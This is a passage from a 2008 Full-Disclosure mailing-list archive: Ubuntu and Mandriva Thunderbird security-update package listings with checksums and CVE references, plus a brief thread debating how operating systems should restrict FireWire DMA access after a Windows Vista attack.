Size/MD5: 3587542 bc3561318d69fedc0f157ab5728a0545 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_sparc.deb Size/MD5: 188922 1a33f8b82f7dd1a6ec36a0fbfcf45894 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_sparc.deb Size/MD5: 56976 572056a18fb37c374f201ec398583b2d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_sparc.deb Size/MD5: 10855430 e4c3f65d7dd305e7567a5820133563e6 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1.diff.gz Size/MD5: 458362 a07bff4dbd70a88e0590a5eaf474b071 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1.dsc Size/MD5: 1677 a494c4c9b7dba82cfdd26b65618dacf7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227.orig.tar.gz Size/MD5: 38264877 4266e1ff163ed81a555a6198a8c2fc45 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_amd64.deb Size/MD5: 3592214 8deae5034786195f9df37595ef8f9c66 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_amd64.deb Size/MD5: 194874 429fdb58bdce69d5b64163679c6721ad http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_amd64.deb Size/MD5: 59988 c08085b641b26c1d11c81a3e2ea8a315 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_amd64.deb Size/MD5: 12102046 794b27b555370504f3c9d39d70fa0287 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_i386.deb Size/MD5: 3589202 576af7e3d35db0291952f461b74f6bb0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_i386.deb Size/MD5: 189532 81740cf1a82437340ded3dbf8d9bc668 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_i386.deb Size/MD5: 56622 051f5aa4a749078227550fe4d8771759 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_i386.deb Size/MD5: 10842634 24a2f47129e13a115cb612ab7d6cf732 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_powerpc.deb Size/MD5: 3591066 8b12a9ffcc2d9d38198c4bbd19b08b76 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_powerpc.deb Size/MD5: 191980 dc997f5ea64b0ce5225c08f737d6fab4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_powerpc.deb Size/MD5: 59702 15afbb248986b685ef1f7ab59660e133 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_powerpc.deb Size/MD5: 11792284 06f9647fb71deeee08d27451ecf38ae0 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_sparc.deb Size/MD5: 3587556 6f575f6e24c7e004c71c3746895288f3 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_sparc.deb Size/MD5: 189390 227d5419c43080baf5316d6186246bc1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_sparc.deb Size/MD5: 57044 428a473e879f97fca358e49d363baa4c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1_sparc.deb Size/MD5: 11055900 f312edc01dbf038d5d4912e20bb2332e Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1.diff.gz Size/MD5: 128338 b8fd04ca331e279466c74ee642f37c9d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1.dsc Size/MD5: 1677 f3d40a99a1bd698eb8793b05593ef9a1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227.orig.tar.gz Size/MD5: 38264877 4266e1ff163ed81a555a6198a8c2fc45 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_amd64.deb Size/MD5: 3592572 cfd1788e37a527b5b421743a53ed6d4e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_amd64.deb Size/MD5: 195362 1b39d27240963b06c8262159f65fecbb http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_amd64.deb Size/MD5: 60482 7cfbfd6ac8e1f90b80f862b8da007cb7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_amd64.deb Size/MD5: 12200898 98d6cadd4934398397d7efac96e5dfa2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_i386.deb Size/MD5: 3589906 52715181859839e6da06ee1d11e23b5b http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_i386.deb Size/MD5: 190018 2b4f148d9e1a17759b53a06d9bf10890 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_i386.deb Size/MD5: 57116 71d8d8d39964a3c1812f169f9c97c5be http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_i386.deb Size/MD5: 10930196 0041f2ae1d9bb1cd903b928409b4b00e powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_powerpc.deb Size/MD5: 3593612 671ed2159590ee6b593c175d3264ae27 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_powerpc.deb Size/MD5: 193502 00a290f2d5693deaaf563562bbce679c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_powerpc.deb Size/MD5: 60476 b652ff1af4528c671b58c72edae91af8 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_powerpc.deb Size/MD5: 12143668 5ba802316344128bf11cab16fefa8d8d sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_sparc.deb Size/MD5: 3589116 d5ba04ed373c0d319707dd46f6451410 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_sparc.deb Size/MD5: 189836 7e1688245d345859a81b8985871b8016 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_sparc.deb Size/MD5: 57538 084b7c136c7de9b5c873a0ded7260ee0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1_sparc.deb Size/MD5: 11157146 15baa6c7a72ce11ca6131f999a99d5c5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/db8419ca/attachment.bin From tim-security at sentinelchicken.org Thu Mar 6 22:30:22 2008 From: tim-security at sentinelchicken.org (Tim) Date: Thu, 6 Mar 2008 14:30:22 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: Message-ID: <20080306223022.GI5138@sentinelchicken.org> Hi Glenn, > It should be realized though that fixing this is not necessarily a simple > thing, nor are architectural considerations missing. I most probably understated the difficulty of implementing a safe ieee1394 DMA driver earlier. However, it's one of those things where the drivers ought to at least default to a safe configuration and allow those who like operating in the "wild west" for the purposes of speed to do so. > As for what can be done by Windows (as opposed to "any OS"), that is perhaps > limited by the great range of underlying hardware. A compromise which might allow > DMA to/from disks, tapes, or CDs but disallow it for most other peripherals > might turn out to be the best general solution available, or something > comparably ugly. In the specific case of FireWire, Windows already does this, but that is exactly how the restrictions were bypassed. You can't trust a disk device any more than any other device, since a laptop can simply emulate a storage device. cheers, tim From Glenn.Everhart at chase.com Thu Mar 6 21:13:15 2008 From: Glenn.Everhart at chase.com (Glenn.Everhart at chase.com) Date: Thu, 6 Mar 2008 16:13:15 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista Message-ID: Certainly in VMS there is DMA opened up, but only to buffers that are known and checked to be legal for such. This is a source of considerable complexity in the drivers, and depending on hardware architecture (number of control registers available, for example, to control DMA channels) limits both number of concurrent operations and size of some operations. For example, the max size of magtape records is limited, in part to conserve such bandwidth for use with disks. If driver writers adopt a "wild-west" approach where the DMA space is left wide open, obviously the security of anything within memory is totally open to whatever a smart peripheral may do. It should be realized though that fixing this is not necessarily a simple thing, nor are architectural considerations missing. But with the advent of more and more smart "peripherals" (at least some of which are commonly user programmable), open DMA access amounts to peek/poke control over all of memory and the abdication by the OS involved of any pretense of security whatever. As for what can be done by Windows (as opposed to "any OS"), that is perhaps limited by the great range of underlying hardware. A compromise which might allow DMA to/from disks, tapes, or CDs but disallow it for most other peripherals might turn out to be the best general solution available, or something comparably ugly. Glenn Everhart -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of Larry Seltzer Sent: Thursday, March 06, 2008 3:36 PM To: Tim Cc: Full Disclosure; Bugtraq Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista >>No, the iPod device signature makes Windows drivers think it should allow DMA access for that device because it detect it as a disk device. >>Other disk device signatures would likely work the same way, that's just the one he happened to emulate. Is it not possible for Windows (or any OS) to open up DMA for a device only to a certain range? If not, what options are available? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ----------------------------------------- This transmission may contain information that is privileged, confidential, legally privileged, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. Although this transmission and any attachments are believed to be free of any virus or other defect that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by JPMorgan Chase & Co., its subsidiaries and affiliates, as applicable, for any loss or damage arising in any way from its use. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you. From security at mandriva.com Fri Mar 7 01:49:53 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Mar 2008 18:49:53 -0700 Subject: [Full-disclosure] [ MDVSA-2008:062 ] - Updated Thunderbird packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:062 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-thunderbird Date : March 6, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 2.0.0.12. This update provides the latest Thunderbird to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0413 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0418 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0591 http://www.mozilla.org/security/announce/2008/mfsa2008-01.html http://www.mozilla.org/security/announce/2008/mfsa2008-03.html http://www.mozilla.org/security/announce/2008/mfsa2008-05.html http://www.mozilla.org/security/announce/2008/mfsa2008-08.html http://www.mozilla.org/security/announce/2008/mfsa2008-12.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: f43e9481755ee803f893b7663474d827 2007.1/i586/mozilla-thunderbird-2.0.0.12-3mdv2007.1.i586.rpm dc1272825146e66702878be26b9782f6 2007.1/i586/mozilla-thunderbird-be-2.0.0.12-1mdv2007.1.i586.rpm 106e0326b5ed649a38853013ac9c89a4 2007.1/i586/mozilla-thunderbird-bg-2.0.0.12-1mdv2007.1.i586.rpm 1263bdbe783c39015dacecc5d17d6365 2007.1/i586/mozilla-thunderbird-ca-2.0.0.12-1mdv2007.1.i586.rpm 3737a3555a9d073a4abc186c82f94e72 2007.1/i586/mozilla-thunderbird-cs-2.0.0.12-1mdv2007.1.i586.rpm f5280f165f81aa50a126dea0a076df3f 2007.1/i586/mozilla-thunderbird-da-2.0.0.12-1mdv2007.1.i586.rpm fb1f6dc252160a70f02ff853c08259db 2007.1/i586/mozilla-thunderbird-de-2.0.0.12-1mdv2007.1.i586.rpm 6b83e17742d42653d0f25b33d4cf7d67 2007.1/i586/mozilla-thunderbird-devel-2.0.0.12-3mdv2007.1.i586.rpm d75dbfb42498e2d6d8292a2c22b2d6c6 2007.1/i586/mozilla-thunderbird-el-2.0.0.12-1mdv2007.1.i586.rpm 39352f296b296e601b9219e79454adc4 2007.1/i586/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2007.1.i586.rpm d61919be55f848349aa0aa3061c61a6d 2007.1/i586/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2007.1.i586.rpm 02c3529a277b54604f9732f5ba90c058 2007.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2007.1.i586.rpm 99f997ee3d2f2dc82c006d95076615fb 2007.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2007.1.i586.rpm f3cf6b328d1463d2492410c58c34d8f3 2007.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2007.1.i586.rpm d29e8409d4ef1f242f8a49e8bd424ab8 2007.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2007.1.i586.rpm 2e45306a457e4279e163f5c2d485b64c 2007.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2007.1.i586.rpm 62559f638fa8f348dbef13a029d2c837 2007.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2007.1.i586.rpm f666e3e2e98ed5167eaefe43eb347602 2007.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2007.1.i586.rpm 2614c027f558548e71d42e45fe6bc728 2007.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2007.1.i586.rpm f2be8ce5c5235bb00c0c75a472d7900f 2007.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2007.1.i586.rpm 279a82e0d4cc646493509dc20998ed01 2007.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2007.1.i586.rpm 6da6ce1c6f1e72866a762eeaa76af7a0 2007.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2007.1.i586.rpm e3c10bc108aae5f6ee196ec640f5ecba 2007.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2007.1.i586.rpm dc2fe3a34b090393f21d39148d83f10a 2007.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2007.1.i586.rpm 82e757fe609111dfcee2ff997d78746b 2007.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2007.1.i586.rpm f769fa6a6e45904face1dea71ae25e05 2007.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2007.1.i586.rpm 018577b5af6ffedaebcb47468653b41f 2007.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2007.1.i586.rpm 504620cd9c4344a85de830d5abe9dc3e 2007.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2007.1.i586.rpm 3d83f88eccf3c6e1acf709c90a66bc64 2007.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2007.1.i586.rpm 4f0dccc0caec94d2ae6a205cf4c7dffa 2007.1/i586/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2007.1.i586.rpm 2224e6430a94a8b4b956230954f38600 2007.1/i586/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2007.1.i586.rpm 9cee3a60acd05f692026d1927ef37905 2007.1/i586/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2007.1.i586.rpm cbf0e96845d04ab609bd61d580f4d920 2007.1/i586/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2007.1.i586.rpm 357bda3c88fdb3a57a60e17d84bf1a78 2007.1/i586/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2007.1.i586.rpm 69176981a3f5582f10311c233bd531b7 2007.1/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2007.1.i586.rpm 53aa8c50874fd94ba26277414704f3af 2007.1/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2007.1.i586.rpm 2594ba90a312682f7f1e8901fd177d06 2007.1/i586/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2007.1.i586.rpm 5abecda0a5b95d1367878461772b3f89 2007.1/i586/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2007.1.i586.rpm f234d86f79cc7dc0c9bcd9af31c7e26c 2007.1/i586/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2007.1.i586.rpm dd51eaf0a772220688fc2dfc3e3e2f3b 2007.1/i586/mozilla-thunderbird-eu-2.0.0.12-1mdv2007.1.i586.rpm 06ec32bef7601c257cc30fe2ce994b9a 2007.1/i586/mozilla-thunderbird-fi-2.0.0.12-1mdv2007.1.i586.rpm 4c28407fd065a8b2a7705547f0d3c075 2007.1/i586/mozilla-thunderbird-fr-2.0.0.12-1mdv2007.1.i586.rpm bba79b9ae7d58895eaa8bb42678f3e32 2007.1/i586/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2007.1.i586.rpm 123ff1fea2422fe8c469aea390bbb5f2 2007.1/i586/mozilla-thunderbird-he-2.0.0.12-1mdv2007.1.i586.rpm c23445f3ba6bfd7efe89006d1723c960 2007.1/i586/mozilla-thunderbird-hu-2.0.0.12-1mdv2007.1.i586.rpm 6ee9c0d1ec8b485eb6f0d0a600fba3de 2007.1/i586/mozilla-thunderbird-it-2.0.0.12-1mdv2007.1.i586.rpm 02676c4240c807ba8727d6ffcb0ee0df 2007.1/i586/mozilla-thunderbird-ja-2.0.0.12-1mdv2007.1.i586.rpm e098069d6f01677da04e0198ed98faa1 2007.1/i586/mozilla-thunderbird-ko-2.0.0.12-1mdv2007.1.i586.rpm 3427bd3d30a580cd2ca5472a27167d77 2007.1/i586/mozilla-thunderbird-lt-2.0.0.12-1mdv2007.1.i586.rpm 96595f51c326f454ef9cf6ae9f6f3552 2007.1/i586/mozilla-thunderbird-mk-2.0.0.12-1mdv2007.1.i586.rpm 820ea27a15eb94f382b39d62b8318825 2007.1/i586/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2007.1.i586.rpm bd1317a2f7a8782e79b46104b1357b12 2007.1/i586/mozilla-thunderbird-nl-2.0.0.12-1mdv2007.1.i586.rpm c9a395fecdb3235cbd21f3608d8f1156 2007.1/i586/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2007.1.i586.rpm 5312f2b18a7e3c8324bff5d68d1864c5 2007.1/i586/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2007.1.i586.rpm 4110c0bbe2199c98b4de39f337134fca 2007.1/i586/mozilla-thunderbird-pl-2.0.0.12-1mdv2007.1.i586.rpm b0dda14ce6f5e8440ef55fcda9915f5c 2007.1/i586/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2007.1.i586.rpm aa1f506a19e4bb5fa044c592f987b9cd 2007.1/i586/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2007.1.i586.rpm 5a8b7a68202b45b64e423d4a1df2b92a 2007.1/i586/mozilla-thunderbird-ru-2.0.0.12-1mdv2007.1.i586.rpm 3d6d21ee6cee6cdc53ddfba8c1e005d4 2007.1/i586/mozilla-thunderbird-sk-2.0.0.12-1mdv2007.1.i586.rpm 35cdfc1211e68ebfd24b862aa301564b 2007.1/i586/mozilla-thunderbird-sl-2.0.0.12-1mdv2007.1.i586.rpm 229383b5dbf67b154cb57493be75328d 2007.1/i586/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2007.1.i586.rpm 04658a91b4886f31903e2d3d46c39573 2007.1/i586/mozilla-thunderbird-tr-2.0.0.12-1mdv2007.1.i586.rpm ef6d8fc0f7b8fd80c7f9490c5393b869 2007.1/i586/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2007.1.i586.rpm 93ef709724ad4e006c4d332b2124f9a1 2007.1/i586/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2007.1.i586.rpm 0d9e556dfbbaa0497a3f3ecd77697dc1 2007.1/i586/nsinstall-2.0.0.12-3mdv2007.1.i586.rpm 7994829adbfce99c9bd19486f086018c 2007.1/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2007.1.src.rpm 7bb65b8f41d245343e53864a59222c73 2007.1/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2007.1.src.rpm 4b3d16efe6d41659c8c45043e8280d9c 2007.1/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 0b353bcecbb020b4b11c67ae8b3b5b5c 2007.1/x86_64/mozilla-thunderbird-2.0.0.12-3mdv2007.1.x86_64.rpm 767ffe2f6d8fc164de7e60499a8be688 2007.1/x86_64/mozilla-thunderbird-be-2.0.0.12-1mdv2007.1.x86_64.rpm b6ec685e3f2360a40402ae389a6e1b79 2007.1/x86_64/mozilla-thunderbird-bg-2.0.0.12-1mdv2007.1.x86_64.rpm 33a0b98d56f28a6fa6041395943d4644 2007.1/x86_64/mozilla-thunderbird-ca-2.0.0.12-1mdv2007.1.x86_64.rpm 8fe7bca08ea19f72423dfffdc778d8d3 2007.1/x86_64/mozilla-thunderbird-cs-2.0.0.12-1mdv2007.1.x86_64.rpm 12528c1dd9560f3dbed8e994f635c1d7 2007.1/x86_64/mozilla-thunderbird-da-2.0.0.12-1mdv2007.1.x86_64.rpm 104df366a07767352f420a0600a46310 2007.1/x86_64/mozilla-thunderbird-de-2.0.0.12-1mdv2007.1.x86_64.rpm 2093c26c276a06108aca03b4bc6bceaa 2007.1/x86_64/mozilla-thunderbird-devel-2.0.0.12-3mdv2007.1.x86_64.rpm 55916c22cc2f19d970cca409999fa126 2007.1/x86_64/mozilla-thunderbird-el-2.0.0.12-1mdv2007.1.x86_64.rpm 78a6a6f9ce266090e1dd212f16b9943f 2007.1/x86_64/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2007.1.x86_64.rpm 8bdeaec12ba204dc8f83ffdee6c2a3ae 2007.1/x86_64/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2007.1.x86_64.rpm b714a42ba919a091665066cf0d4620da 2007.1/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2007.1.x86_64.rpm 86186705deb6b5a1ab17530e0778840e 2007.1/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2007.1.x86_64.rpm ba02f35184fdef63a153b79ca3bea302 2007.1/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2007.1.x86_64.rpm 331f85b56a58454e6b79ce273acd8fb0 2007.1/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2007.1.x86_64.rpm ba09ba8e49ccff5ca3645a6c78703e9d 2007.1/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2007.1.x86_64.rpm 926b652777cc970313e092feadf6431e 2007.1/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2007.1.x86_64.rpm be42c9c5b9a8073780d43a11017206cb 2007.1/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2007.1.x86_64.rpm 2685ca520098ac7f1427be5dec123db5 2007.1/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2007.1.x86_64.rpm cdd90b91b2e5b17e429fef489f9b8919 2007.1/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2007.1.x86_64.rpm 25cdcbcaab2b638f5ba032faea680765 2007.1/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2007.1.x86_64.rpm 4f6093825f9b71c805276b533643449d 2007.1/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2007.1.x86_64.rpm e01ebeae93cca9ce75baf15e11214058 2007.1/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2007.1.x86_64.rpm ff0f993ad4329b9be4b91f734c4c636f 2007.1/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2007.1.x86_64.rpm 80d2ce3a7710511804df59b2fc510b1b 2007.1/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2007.1.x86_64.rpm 22fd330480d1a841b8215a1cca7b3f6a 2007.1/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2007.1.x86_64.rpm 55688d5bffb22581bd0d0ea70ffde231 2007.1/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2007.1.x86_64.rpm 4575bdf3e0d67d0b1c8f16a81881e7e2 2007.1/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2007.1.x86_64.rpm 1912fb3e531cefa2856142d980e62888 2007.1/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2007.1.x86_64.rpm 6fe950bf079fa79cea61e43078d083b6 